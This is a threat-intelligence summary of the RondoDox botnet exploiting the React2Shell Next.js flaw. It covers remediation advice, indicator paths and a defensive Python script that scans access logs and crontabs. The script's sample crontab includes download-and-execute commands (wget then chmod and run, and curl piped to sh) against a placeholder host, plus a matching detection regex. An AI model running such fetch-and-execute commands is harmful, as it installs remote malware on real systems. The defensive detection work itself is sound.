Full Report
Cybersecurity researchers have disclosed details of a persistent nine-month-long campaign that has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector, CloudSEK said in an
Analysis Summary
# Vulnerability: React2Shell (RCE in React Server Components/Next.js) exploited by RondoDox Botnet
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: 10.0 (Critical)
- CWE: not given in the source (the description indicates remote code execution via a React Server Components/Next.js flaw)
## Affected Systems
- Products: React Server Components (RSC), Next.js applications
- Versions: not specified in the source; consult vendor guidance for the exact vulnerable and patched versions.
- Configurations: Devices and web applications running susceptible versions of Next.js or utilizing RSC. The attack specifically targeted IoT devices and web servers.
## Vulnerability Description
React2Shell is a critical security vulnerability found in React Server Components (RSC) and Next.js which enables unauthenticated attackers to achieve Remote Code Execution (RCE) on vulnerable devices. The RondoDox botnet campaign has been actively exploiting this flaw since late 2025 to gain initial access.
## Exploitation
- Status: Exploited in the wild (Used by the RondoDox botnet since at least December 2025)
- Complexity: Low (inferred: an unauthenticated RCE being leveraged for mass infection)
- Attack Vector: Network (Initial access vector for C2 interaction and payload delivery)
## Impact
- Confidentiality: High (Potential for full system compromise, though primary observed impact is malware installation)
- Integrity: High (Ability to execute arbitrary code, install persistence mechanisms, and terminate other processes/malware)
- Availability: High (Installation of cryptocurrency miners and botnet loaders impacts system resources)
## Remediation
### Patches
- The source does not name specific patched versions; organizations are advised to **update Next.js to a patched version as soon as possible.**
### Workarounds
- Segment all IoT devices into dedicated VLANs.
- Deploy Web Application Firewalls (WAFs).
- Block known Command and Control (C2) infrastructure associated with recent RondoDox activity.
## Detection
- **Indicators of Compromise (IOCs):** Requests or download attempts that reference paths such as `/nuts/poop` (the cryptocurrency miner), `/nuts/bolts` (the botnet loader/health checker), and `/nuts/x86` (the Mirai variant).
- **Detection Methods and Tools:** Monitor for suspicious process execution on web hosts and IoT devices. Monitor network traffic for connections to known RondoDox C2 servers. Look for new cron jobs, particularly in `/etc/crontab`, related to unknown processes.
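The two checks above can be scripted. The following is an added example, not code from the CloudSEK report or from any vendor: it scans web-server access-log lines for requests that reference the RondoDox paths listed above, and scans `/etc/crontab`-style entries for commands that reference those paths. The download-and-execute cron heuristic (`wget`/`curl` piped or chained into a shell) is an added generic pattern, not an indicator from the report; all sample log and crontab lines are constructed for illustration.

```python
"""Added example (not from the CloudSEK report): flag RondoDox indicators in
web access logs and crontab entries. Sample inputs are constructed."""
import re
from typing import Dict, List

# Paths named in the report, mapped to the role the report assigns them.
RONDODOX_PATHS = {
    "/nuts/poop": "cryptocurrency miner",
    "/nuts/bolts": "botnet loader / health checker",
    "/nuts/x86": "Mirai variant",
}

# Common Log Format: client, ident, user, [timestamp], "request line", status.
_ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Cron entry: five schedule fields or an @keyword, optional user column
# (present in /etc/crontab), then the command.
_CRON_RE = re.compile(r'^\s*(?:@\w+\s+|(?:\S+\s+){5})(?:\S+\s+)?(?P<cmd>.+)$')

# Added heuristic (assumption, not from the report): fetch-then-execute.
_FETCH_EXEC_RE = re.compile(r'\b(wget|curl)\b.*(\|\s*(ba)?sh\b|&&\s*(chmod|\./))')


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """One finding per parsed access-log line whose request target contains a
    known RondoDox path. Unparseable lines are skipped, not flagged."""
    findings = []
    for line in lines:
        m = _ACCESS_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        for path, role in RONDODOX_PATHS.items():
            if path in target:
                findings.append({
                    "source": "access_log", "client": m.group("client"),
                    "timestamp": m.group("ts"), "target": target,
                    "indicator": path, "role": role,
                })
    return findings


def scan_crontab(lines: List[str]) -> List[Dict[str, str]]:
    """Flag cron commands that reference a RondoDox path; otherwise flag
    commands matching the added download-and-execute heuristic."""
    findings = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _CRON_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        hit = next((p for p in RONDODOX_PATHS if p in cmd), None)
        if hit:
            findings.append({"source": "crontab", "command": cmd,
                             "indicator": hit, "role": RONDODOX_PATHS[hit]})
        elif _FETCH_EXEC_RE.search(cmd):
            findings.append({"source": "crontab", "command": cmd,
                             "indicator": "download-and-execute",
                             "role": "generic persistence pattern (heuristic)"})
    return findings


# Constructed sample data; 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24
# are documentation ranges, not real infrastructure.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2025:08:14:02 +0000] "POST / HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Dec/2025:08:14:03 +0000] "GET /nuts/bolts HTTP/1.1" 404 153',
    '198.51.100.4 - - [10/Dec/2025:08:15:10 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Dec/2025:08:16:41 +0000] "GET /nuts/x86 HTTP/1.1" 404 153',
]
SAMPLE_CRONTAB = [
    "# /etc/crontab: system-wide crontab",
    "17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly",
    "*/5 * * * * root wget -q -O /tmp/.b http://192.0.2.10/nuts/bolts && chmod +x /tmp/.b && /tmp/.b",
    "@reboot root curl -s http://192.0.2.10/x.sh | sh",
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG) + scan_crontab(SAMPLE_CRONTAB):
        print(f)
```

Run it against real files by reading them into the two functions line by line; the access-log parser expects Common Log Format, so adapt `_ACCESS_RE` for JSON or combined formats with extra fields. A 404 on a `/nuts/...` request is still worth an alert, since the report describes these as scans rather than successful retrievals.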
## References
- Vendor advisories: consult the Next.js/React advisories for the exact vulnerable and patched versions.
- CloudSEK analysis (URL not provided in the source text; this summary is based on the researchers' findings).
- Shadowserver Foundation: statistics on externally exposed, susceptible IP addresses.
- Darktrace, Kaspersky and VulnCheck analyses that mention abuse of CVE-2025-55182.